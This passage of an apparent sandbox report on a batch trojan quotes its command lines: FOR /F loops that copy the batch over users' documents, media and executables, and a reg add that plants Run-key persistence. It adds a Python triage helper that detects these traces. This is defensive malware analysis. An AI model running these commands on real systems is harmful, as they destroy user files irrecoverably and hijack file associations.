    Signatures: Drops file in System32 directory; Drops file in Program Files directory; Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (PID 4300)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 4648)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (PID 2308)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 5108)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
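What the process tree shows, read as a responder would: the batch first registers itself under HKLM\...\CurrentVersion\Run, then for each of eight list files (InfList_doc.txt, lnk, pdf, txt, mp3, exe, mp4, png; the page does not show how these lists are produced) it runs FOR /F "tokens=1,* delims=: " over every line, rebuilds the full path as "%j:%k" and does copy /y of itself over that path. Each FOR child is paired with an "echo Y" child because cmd runs the two sides of a pipe in separate cmd.exe /S /D /c instances, so the Y is piped into the copy, presumably to answer any prompt. The file keeps its original name and extension but its content is now the batch file, which is exactly what the last Downloads entry shows: a .docx under the user's Templates folder carrying the sample's own MD5/SHA1/SHA256/SHA512. The "Modifies registry class" IoCs repoint the default ProgID of .doc, .exe, .lnk, .mp3, .mp4, .pdf and .txt to batfile, so the overwritten files still open through the batch-file handler. The helpers below are an added example, not part of this report or of the sample: they take the command lines and IoC lines as printed on this page (the constants reproduce that text) plus a local directory, and return the targeted extensions, the Run-key persistence, the hijacked extensions, and every file whose content hash matches the sample. The demo file tree and its fake payload are constructed for the example; all function names are my own.

```python
"""Triage helpers for the Trojan.Bat.FortniteHackz.bat sandbox report.

Added example, not part of the report or the sample. Inputs are text copied from
the report plus a local directory, so everything runs offline. The report text in
the constants is transcribed from the page; the file tree built by
build_demo_tree() is constructed for the demo.
"""
import hashlib
import os
import re
import tempfile

# SHA256 of the submitted batch file, from the report's General section.
SAMPLE_SHA256 = "273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92"

REG_ADD_CMD = ('reg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
               '/v "rundll32_12735_toolbar" /t "REG_SZ" /d C:\\Users\\Admin\\AppData'
               '\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat /f')
# The eight FOR /F children in the report differ only in the list file name.
FOR_CMD = ('C:\\Windows\\system32\\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " '
           '%j in (InfList_{ext}.txt) do copy /y C:\\Users\\Admin\\AppData\\Local\\Temp'
           '\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat "%j:%k""')
PROCESS_CMDLINES = [REG_ADD_CMD] + [
    FOR_CMD.format(ext=e) for e in ("doc", "lnk", "pdf", "txt", "mp3", "exe", "mp4", "png")]

# "Modifies registry class" IoC lines as printed in the report (Set value lines).
CLASSES_IOC_TEXT = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4 cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile" cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile" cmd.exe
"""

INFLIST_RE = re.compile(r"in \(InfList_(\w+)\.txt\)")
RUN_KEY_RE = re.compile(
    r'reg add "hklm\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "([^"]+)" .*?/d (\S+)',
    re.IGNORECASE)
CLASSES_RE = re.compile(
    r'Set value \(str\) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\(\.\w+)\\ = "([^"]+)"')


def targeted_extensions(cmdlines):
    """Extensions the overwriter iterates, recovered from the FOR /F command lines."""
    return sorted({m.group(1).lower() for c in cmdlines for m in INFLIST_RE.finditer(c)})


def run_key_persistence(cmdlines):
    """(value name, payload path) for every reg add against the HKLM Run key."""
    return [(m.group(1), m.group(2)) for c in cmdlines for m in [RUN_KEY_RE.search(c)] if m]


def rebuild_inflist_path(line):
    r"""Reproduce what FOR /F "tokens=1,* delims=: " %j ... "%j:%k" does to one line
    of an InfList_*.txt file. The delimiters are ':' and ' ', so for "C:\dir\a b.doc"
    %j is the drive letter and %k is the remainder; spaces inside %k survive because
    '*' keeps the rest of the line verbatim, and "%j:%k" re-joins the path. Lines
    starting with ';' are skipped by FOR /F's default eol, so they yield None."""
    line = line.rstrip("\r\n")
    if line.startswith(";"):
        return None
    m = re.match(r"[: ]*([^: ]+)[: ]*(.*)", line)
    if not m or not m.group(2):
        return None  # blank line, or no path part after the drive letter
    return f"{m.group(1)}:{m.group(2)}"


def hijacked_extensions(ioc_text, progid="batfile"):
    """Extensions whose HKLM Classes default ProgID was repointed to batfile."""
    return sorted(ext for ext, pid in CLASSES_RE.findall(ioc_text) if pid.lower() == progid)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_overwritten_files(root, sample_sha256=SAMPLE_SHA256):
    """Relative paths (forward slashes) of every file under root whose content is the
    sample. copy /y keeps the victim's name and extension, so match on content hash,
    not on name: that is why a .docx in the report carries the batch file's hashes."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                if sha256_of(p) == sample_sha256:
                    hits.append(os.path.relpath(p, root).replace(os.sep, "/"))
            except OSError:
                continue
    return sorted(hits)


def build_demo_tree():
    """Constructed stand-in for a victim profile: a fake payload replaced two files
    (names kept, content replaced) and one file is untouched. Returns (root, sha256)."""
    payload = b"@echo off\r\nrem constructed stand-in, not the sample's content\r\n"
    root = tempfile.mkdtemp(prefix="fortnitehackz-demo-")
    files = {"Documents/report.docx": payload, "Pictures/cat.png": payload,
             "Documents/notes.txt": b"untouched user data\r\n"}
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root, hashlib.sha256(payload).hexdigest()


if __name__ == "__main__":
    print("targeted extensions:", targeted_extensions(PROCESS_CMDLINES))
    print("Run key persistence:", run_key_persistence(PROCESS_CMDLINES))
    print("hijacked ProgIDs:", hijacked_extensions(CLASSES_IOC_TEXT))
    root, digest = build_demo_tree()
    print("overwritten files:", find_overwritten_files(root, digest))
```

On a real host you would point find_overwritten_files at the user profile and Program Files with SAMPLE_SHA256 and treat every hit as unrecoverable (the original content is gone, not appended to), then remove the Run value and restore the seven Classes defaults before opening anything with those extensions.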
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 548e0aca55c4cae0e2df2d0d5ac18f34
  SHA1: 311e507a79c8174007d26837ff55b25722eae0ca
  SHA256: 3ed54618f793a9f7f9c033d5d3e5d3c68ded55df8710428dd7a40872db6e0f9a
  SHA512: 5355d65bfbb5587dcda21d026c948229cee95dddc78b0e825106dcedc4f13e008cfbbf49266a09d8847189ee569a266f5827be0e8ed88bab7f91c9a3f12250ca
- Filesize: 428KB
  MD5: 42157d62377b0bfcfa95bca5b12136b5
  SHA1: 02d5874d9843b89c16b80bfc0c2cbd26d875b481
  SHA256: f7784c781833f51b94600e11732943a31d368ac259360e72e3b944cb35b38388
  SHA512: ae9974836072dd043ad8a8f75be51f72a4e0be7326ef5a6b547b8e5823113303560587a3f7bfe20a0c3b8c7c6c70c2ef2328ea9984eb073bea456d242e0ff645
- Filesize: 37KB
  MD5: fef2df506ee1214eb1b613b8fc536439
  SHA1: 3985c77b58a678c6d3c96f002cd9579b1732257b
  SHA256: 88c9e05be13767bb5c67ea29e8b241197e8d9e8ac229596cc0c9f277bf840eb0
  SHA512: 9dcacbde5518b80e18aa3a097ccce021bd94c87c0f8f8bd59e8b96a72845520b70ce0e851cf2e05ac73abbc9d6b37564bd12bde5d93e754d452a803ae0e29ef4
- Filesize: 1KB
  MD5: 59ea1c8fcc19ef7b68f5b815b5ab66ce
  SHA1: 8667b22c499703e9950984a694ed0c4fbda21c05
  SHA256: 36dcdf53d889cba601ba0f255ceb21a755780cdbe7c70383f5491e5f4481b87e
  SHA512: 080e22fe69858d2128e226436d3c8cd99911cbf7978fb898249505f8690491b6b29ab44c33f0bdf1b9e8f70f56abb60f0659b2b00e50d5fe5f9a2644c1546c98
- Filesize: 2KB
  MD5: d5e1a37b60ca49583586dfdb3344b6b0
  SHA1: 00a606d0b5d0b0b59e9817fdd6149cc46f2b8e8f
  SHA256: 90ea0016d98e3494b20f255aad714504afc9663329342d47782750ce88089c93
  SHA512: b76ed027e64adba03e1740dad648c33bdcd11cefe517318567b8f345ed37f9b5673cd5af16538212888929bf954a39e39e5b609a41a047e334179d01633e8840
- Filesize: 2.1MB
  MD5: 50fdd0dc567d10123b19045481eb7bfb
  SHA1: 49a97d143326c7481fdeb68f934e373729b8a47a
  SHA256: 4c2c979e92513d0092de287005c83af46f5335be603175192a8bd878f482c2fb
  SHA512: 8765bd61eafe4e5223edf2dd1f5123927cdb2f6f8c9cd31fb20dd6fb37a5b7f594c3282b94cfbab774f40eae9b53e0c982e3c6e4ec52f4a51e1a1df53eb4615b
- Filesize: 35KB
  MD5: f4b7738f0b43402682d34e0fa25c3094
  SHA1: 7574bd63175ef0fee8f3c384a1b5b63bdbb42fbc
  SHA256: 780e0730d95ec043a8df4259d29cdb67295904863ed3e9d51e4333c48a4f063b
  SHA512: 70fd2bda5cc440d8126206b5c32eb34d730ba74f0217b5d3ab4b00caf716f0b15e9f24676ce317ae2946248598fe4fa1c0667f2214adacf51a0b356f544cb39c
- C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx
  Filesize: 34KB
  MD5: ac04b6f6fa293c4b55c4c8b49372a9ec
  SHA1: 9dfca519218c3c10203163454f1237916b0655cc
  SHA256: 273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
  SHA512: b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
  (all four hashes are identical to the submitted batch file: this document was overwritten by the copy /y loop)